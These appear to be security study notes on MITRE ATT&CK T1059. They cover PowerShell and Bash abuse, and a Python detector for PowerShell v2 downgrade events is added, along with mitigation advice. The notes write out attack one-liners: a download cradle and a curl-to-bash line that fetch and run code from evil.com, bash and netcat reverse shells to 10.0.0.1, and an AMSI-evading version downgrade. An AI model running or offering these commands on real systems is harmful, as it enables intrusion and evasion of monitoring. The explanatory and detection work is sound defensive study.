Command and Scripting Interpreter (T1059)
Adversaries abuse built-in interpreters to execute commands without dropping their own binaries to disk.
1. PowerShell (Windows)
The most powerful tool on Windows.
Execution Policy Bypass
The "Execution Policy" is a user safety feature, NOT a security boundary.
powershell -ExecutionPolicy Bypass -File script.ps1
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
In-Memory Execution (Fileless)
Running code directly from RAM.
$code = 'Create-Thread...';
Invoke-Expression $code;
Evasion: Downgrade Attack
PowerShell v2.0 does not support AMSI (Anti-Malware Scan Interface) or Script Block Logging.
powershell -version 2
Mitigation: Uninstall PowerShell v2.0 on all endpoints.
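Detection logic for the downgrade described above, written here as an added example rather than code from the original notes: Windows PowerShell Event ID 400 ("Engine state is changed") records both HostVersion and EngineVersion, so a v5 host starting a v2 engine is visible in the log. The event records below are constructed to mimic that message layout; the field names HostVersion and EngineVersion are real, the version values and the event list are sample data.

```python
import re

# Constructed sample events shaped like Windows PowerShell Event ID 400
# messages (not real telemetry). Record 1 is a normal v5 session,
# record 2 is a v5 host that launched the v2 engine (downgrade),
# record 3 is a legacy host that only ever had v2 installed.
SAMPLE_EVENTS = [
    {"EventID": 400, "Message": "Engine state is changed from None to Available.\n"
        "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n\tEngineVersion=5.1.19041.1"},
    {"EventID": 400, "Message": "Engine state is changed from None to Available.\n"
        "\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.1\n\tEngineVersion=2.0"},
    {"EventID": 400, "Message": "Engine state is changed from None to Available.\n"
        "\tHostName=ConsoleHost\n\tHostVersion=2.0\n\tEngineVersion=2.0"},
    {"EventID": 403, "Message": "Engine state is changed from Available to Stopped."},
]

FIELD_RE = re.compile(r"^\s*(HostVersion|EngineVersion)=(\S+)", re.MULTILINE)


def parse_versions(message):
    """Return {'HostVersion': ..., 'EngineVersion': ...} from an event message."""
    return {name: value for name, value in FIELD_RE.findall(message)}


def major(version):
    """Major component of a dotted version string, or None if unparsable."""
    head = version.split(".", 1)[0]
    return int(head) if head.isdigit() else None


def is_downgrade(event):
    """True when a v3+ host started a v2.x engine (AMSI/ScriptBlock logging absent).

    A v2 host running a v2 engine is a legacy box, not a downgrade, and is
    reported separately by classify() so it can be tracked for removal.
    """
    if event.get("EventID") != 400:
        return False
    v = parse_versions(event.get("Message", ""))
    eng, host = major(v.get("EngineVersion", "")), major(v.get("HostVersion", ""))
    return eng == 2 and host is not None and host >= 3


def classify(events):
    """Split events into indexes flagged as downgrades and as legacy v2 hosts."""
    downgrades, legacy = [], []
    for i, ev in enumerate(events):
        if is_downgrade(ev):
            downgrades.append(i)
        elif ev.get("EventID") == 400:
            v = parse_versions(ev.get("Message", ""))
            if major(v.get("EngineVersion", "")) == 2:
                legacy.append(i)
    return {"downgrade": downgrades, "legacy_v2": legacy}
```

Once the v2 engine is removed with `Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root`, `powershell -version 2` falls back to the current engine and these events stop appearing.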
2. Bash / Sh (Linux)
The standard for Linux post-exploitation.
Reverse Shells
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/443 0>&1
# Fifo Pipe (creates a file)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f
Fileless Execution
Executing a script fetched from a URL without saving it to disk.
curl https://evil.com/script.sh | bash
3. Visual Basic (VBScript / JScript)
Often used in dropped files (User Execution).
- HTA (HTML Application): executes via mshta.exe.
- WScript: executes .vbs files.